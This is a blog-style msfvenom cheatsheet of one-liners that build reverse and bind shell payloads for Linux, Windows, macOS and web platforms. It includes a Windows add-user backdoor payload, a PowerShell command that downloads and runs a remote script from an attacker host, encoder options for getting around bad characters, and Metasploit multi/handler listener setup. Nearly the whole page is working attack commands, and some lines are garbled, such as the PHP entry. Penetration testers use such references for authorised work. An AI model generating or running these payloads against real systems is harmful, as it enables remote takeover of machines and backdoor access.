Msfvenom Cheatsheet
@ Animesh Roy | Thursday, Apr 1, 2021 | 3 minutes read | Update at Thursday, Apr 1, 2021

MSFVenom Cheatsheet

Single Page Cheatsheet for common MSF Venom One Liners
Available in PDF, DOCX and Markdown format! PDF and DOCX versions contain the payload size in bytes and a few more commands.

MSFVenom Cheatsheet

MSFVenom Payload Generation One-LinerDescription
msfvenom -l payloadsList available payloads
msfvenom -p PAYLOAD –list-optionsList payload options
msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IPPayload Encoding
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux Meterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux bind shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux reverse shell x64 single stage
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows Meterpreter reverse shell
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent=“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” -f exe > shell.exeWindows Meterpreter http reverse shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exeWindows Meterpreter bind shell
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows CMD Multi Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows CMD Single Stage
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exeWindows add user
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.machoMac Reverse Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.machoMac Bind shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.pyPython Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.shBASH Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.plPERL Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.aspASP Meterpreter shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jspJSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.warWAR Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php cat shell.phppbcopy && echo ‘?php '
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.phpPhp Reverse Shell
msfvenom -a x86 –platform Windows -p windows/exec CMD=“powershell \“IEX(New-Object Net.webClient).downloadString(‘http://IP/nishang.ps1’)"” -f pythonWindows Exec Nishang Powershell in python
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b “\x04\xA0”Bad characters shikata_ga_nai
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b “\x04\xA0”Bad characters fnstenv_mov

Multihandler Listener

To get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse_tcp payload,

msf>use exploit/multi/handler  
msf>set payload windows/meterpreter/reverse_tcp  
msf>set lhost <IP>  
msf>set lport <PORT>  
msf> set ExitOnSession false  
msf>exploit -j  

The -j option is to keep all the connected session in the background.


© 2010 - 2023 Classroom

Reading Stuffs

Social Links